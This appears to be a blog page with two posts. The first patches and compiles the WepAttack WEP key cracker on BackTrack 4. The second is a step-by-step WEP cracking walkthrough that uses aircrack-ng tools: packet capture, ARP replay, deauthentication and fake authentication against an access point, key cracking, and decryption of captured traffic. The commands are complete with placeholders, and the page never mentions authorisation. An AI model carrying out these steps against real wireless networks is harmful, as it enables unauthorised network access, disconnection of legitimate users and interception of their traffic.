0

Compiling wepattack on backtrack4

-

I encountered various errors when compiling wepattack. This download does not come with a makefile that is compatible with the ubuntu distro that backtrack uses. First of all make sure that the wlan directory that you get when untarring the .tar.gz archive has execute permissions set to it.

$ cd WepAttack-0.1.3/src
$ chmod +x wlan

Once this is done “permission denied” errors should go.

/Desktop/WepAttack-0.1.3/src$ make
gcc -fno-for-scope -c -D__LINUX_WLAN__ -D__I386__ -o wepattack.o wepattack.c
cc1: warning: command line option "-fno-for-scope" is valid for C++/ObjC++ but not for C
wepattack.c: In function ‘loop_packets’:
wepattack.c:141: warning: incompatible implicit declaration of built-in function ‘strlen’
wepattack.c:146: warning: incompatible implicit declaration of built-in function ‘strlen’
wepattack.c:151: warning: incompatible implicit declaration of built-in function ‘strlen’
wepattack.c:156: warning: incompatible implicit declaration of built-in function ‘strlen’
wepattack.c: In function ‘clean_up’:
wepattack.c:184: warning: format ‘%d’ expects type ‘int’, but argument 3 has type ‘long int’
wepattack.c: In function ‘main’:
wepattack.c:309: warning: format ‘%d’ expects type ‘int’, but argument 2 has type ‘long int’
gcc -fno-for-scope -c -D__LINUX_WLAN__ -D__I386__ -o rc4.o rc4.c
cc1: warning: command line option "-fno-for-scope" is valid for C++/ObjC++ but not for C
gcc -fno-for-scope -c -D__LINUX_WLAN__ -D__I386__ -o wepfilter.o wepfilter.c
cc1: warning: command line option "-fno-for-scope" is valid for C++/ObjC++ but not for C
gcc -fno-for-scope -c -D__LINUX_WLAN__ -D__I386__ -o log.o log.c
cc1: warning: command line option "-fno-for-scope" is valid for C++/ObjC++ but not for C
gcc -fno-for-scope -c -D__LINUX_WLAN__ -D__I386__ -o modes.o modes.c
cc1: warning: command line option "-fno-for-scope" is valid for C++/ObjC++ but not for C
modes.c:25:30: error: wlan/wlan_compat.h: Permission denied
modes.c:26:28: error: wlan/p80211hdr.h: Permission denied
modes.c: In function ‘generate_rc4_key’:
modes.c:51: warning: incompatible implicit declaration of built-in function ‘memcpy’
modes.c: In function ‘process_rc4_key’:
modes.c:68: warning: incompatible implicit declaration of built-in function ‘memcpy’
modes.c: In function ‘mode_keygen’:
modes.c:125: warning: incompatible implicit declaration of built-in function ‘memcpy’
modes.c:127: warning: incompatible implicit declaration of built-in function ‘strcpy’
modes.c: In function ‘mode_wep’:
modes.c:145: warning: incompatible implicit declaration of built-in function ‘memcpy’
make: *** [modes.o] Error 1

The following patch file will take care of most errors and you should be able to get Wepattack compiled properly:

diff -aur WepAttack-0.1.3/src/Makefile WepAttack-patched/src/Makefile
--- WepAttack-0.1.3/src/Makefile 2002-10-23 09:11:36.000000000 -0400
+++ WepAttack-patched/src/Makefile 2010-09-26 04:54:20.000000000 -0400
@@ -6,23 +6,23 @@
LD=gcc
#
# CFLAGS
-CFLAGS=-fno-for-scope -c -D__LINUX_WLAN__ -D__I386__
+CFLAGS= -c -D__LINUX_WLAN__ -D__I386__
#
#
# LDFLAGS
-#LDFLAGS=
+LDFLAGS=-L../run
#
#
# Libraries to link against
-LIBS= -lpcap -lz -lcrypto
+LIBS= -lpcap -lz -lcrypto
#
#
# Install path for wepattack
INSTDIR=/usr/bin

+INCLUDEDIR=-Isrc/
wepattack: wepattack.o rc4.o wepfilter.o log.o modes.o misc.o verify.o keygen.o
- $(LD) $(LDFLAGS) -o $@ wepattack.o rc4.o wepfilter.o log.o\
- modes.o misc.o verify.o keygen.o $(LIBS)
+ $(LD) $(LDFLAGS) $(INCLUDEDIR) -o $@ wepattack.o rc4.o wepfilter.o log.o modes.o misc.o verify.o keygen.o $(LIBS)

wepattack.o: wepattack.c wepattack.h
$(CC) $(CFLAGS) -o $@ wepattack.c
@@ -46,7 +46,7 @@
$(CC) $(CFLAGS) -o $@ keygen.c

modes.o: modes.c modes.h
- $(CC) $(CFLAGS) -o $@ modes.c
+ $(CC) $(CFLAGS) $(INCLUDEDIR) -o $@ modes.c

misc.o: misc.c misc.h
$(CC) $(CFLAGS) -o $@ misc.c
diff -aur WepAttack-0.1.3/src/modes.c WepAttack-patched/src/modes.c
--- WepAttack-0.1.3/src/modes.c 2002-10-24 09:15:19.000000000 -0400
+++ WepAttack-patched/src/modes.c 2010-09-26 04:55:22.000000000 -0400
@@ -29,6 +29,7 @@
#include "wepattack.h"
#include "wepfilter.h"
#include "verify.h"
+#include "string.h"

static rc4_key gen_key;
static unsigned char decrypted_stream[2400];
Only in WepAttack-patched/src: wepattack
diff -aur WepAttack-0.1.3/src/wepattack.c WepAttack-patched/src/wepattack.c
--- WepAttack-0.1.3/src/wepattack.c 2002-10-24 09:14:29.000000000 -0400
+++ WepAttack-patched/src/wepattack.c 2010-09-26 04:41:18.000000000 -0400
@@ -36,7 +36,7 @@
#include "config.h"
#include "modes.h"
#include "misc.h"
-
+#include

wlan_packet_list* current_packet;

@@ -181,7 +181,7 @@

// calculate elapsed time
duration = difftime_us(&t_val_start, &t_val_end);
- printf("\ntime: %f sec\twords: %d\n\n", duration, word_count);
+ printf("\ntime: %f sec\twords: %ld\n\n", duration, word_count);

// write ucracked packets to logfile
log_uncracked(list_packet_to_crack);
@@ -306,7 +306,7 @@

// print out each 10'000 key
if ((word_count % 10000) == 0)
- printf("key no. %d: %s\n", word_count, key);
+ printf("key no. %ld: %s\n", word_count, key);
word_count++;

// main loop to process key in modes on every packet

Copy the above patch in to a file called wepattack.patch. Copy wepattack.patch into the WepAttack-0.1.3 directory and patch it as follows:

$ patch -p1 <wepattack.patch
$ cd src
make
sudo make install

You should be able to get wepattack installed!

1

WEP Cracking

-

If you want to crack WEP keys of an AP that is using WEP.

The following steps should be performed:

Start Capturing packets first:
sudo airodump-ng –bssid <APMAC> -w <CAPTUREFILE> –channel <CHANNELNUM> <IFACE>

Start capturing ARP packets:
sudo aireplay-ng –arpreplay -e <ESSID> -b <APMAC> -h <ASSOCIATEDCLIENTMAC> <IFACE>

Send deauth packets:
sudo aireplay-ng –deauth 5 -a <APMAC> -c <ASSOCIATEDCLIENTMAC> -e <ESSID> <IFACE>

Send fakeauth packets:
sudo aireplay-ng –fakeauth 5 -e <ESSID> -b <APMAC> -h <ASSOCCLIENTMAC> <IFACE>

Cracking WEP:
aircrack-ng -e <ESSID> -b <APMAC> -n <BITSIZE> -f <FUDGEFACTOR> <CAPTUREFILE>

The fudge factor is a measure of how much randomness to check for. I am not exactly sure of its cryptographic significance, however, it may make the difference between cracking a WEP key and not.

Sometimes you may have an AP with no clients connected to it. In such cases, follow the instructions at the following URL:
How to crack WEP with no clients.

Once the WEP keys are obtained then use airdecap-ng to decrypt the packets:
airdecap-ng -b <APMAC> -e <ESSID> -w <KEY> <PCAPFILE>
tcpdump -r <PCAPFILE>-dec.cap